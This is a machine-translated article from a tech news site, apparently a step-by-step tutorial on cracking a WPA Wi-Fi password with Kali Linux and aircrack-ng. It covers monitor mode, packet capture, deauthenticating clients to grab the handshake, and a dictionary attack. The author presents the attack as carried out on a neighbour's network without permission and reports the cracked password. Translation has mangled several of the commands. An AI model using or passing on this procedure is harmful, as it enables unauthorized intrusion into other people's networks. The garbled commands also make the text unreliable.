In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-02-25 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)06/01 Report--
What needs to be used in the cracking process are kali operating system, a powerful external wireless network card and a cracking dictionary.
What I use here is a kali installed on a virtual machine and an external wireless network card. The wireless password set next door is too simple. After grabbing the handshake bag, the dictionary ran out of the password for more than a minute. Good luck. Don't talk too much nonsense, please look at the steps next. There is a picture for reference!
1-first open the kali on the virtual machine and connect the wireless network card to the virtual machine
2-Open a terminal and enter the command iwconfig to check the name of your wireless network card, usually wlan0. If it is displayed, it means that the network card is connected.
3-enable wireless monitoring, enter the command airmon-ng start wlan0, and if you see a process influence, kiil directly until there is no prompt.
4-then type airodump-ng mon0 to start listening to grab packets
5-when listening is enabled, select the target AP, that is, enter airodump-ng-w loiter-c 1 (channel number, which should be the same as the channel of AP)
6-Open the new terminal, do not turn off before, enter aireplay-ng-010-an AP'sMAC-c CP'sMAC mon0,AP's MAC in the new terminal is the address under BSSID, CP'sMAC is the address under STATION is CP
Until the first terminal grabs the handshake bag, the WAP Handshake flag appears (below).
7-then type in the new terminal: the path of the aircrack-ng-w dictionary-the path of the b AP's MAC handshake package (as shown below) to crack.
8-here is the picture I took after I successfully cracked it (it depends on luck. To see if there is any AP password cracked in your dictionary, you can use a larger dictionary, but it takes a long time to run. The password cracked is 00001111, which is so simple that the dictionary only ran for one minute to crack it.
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.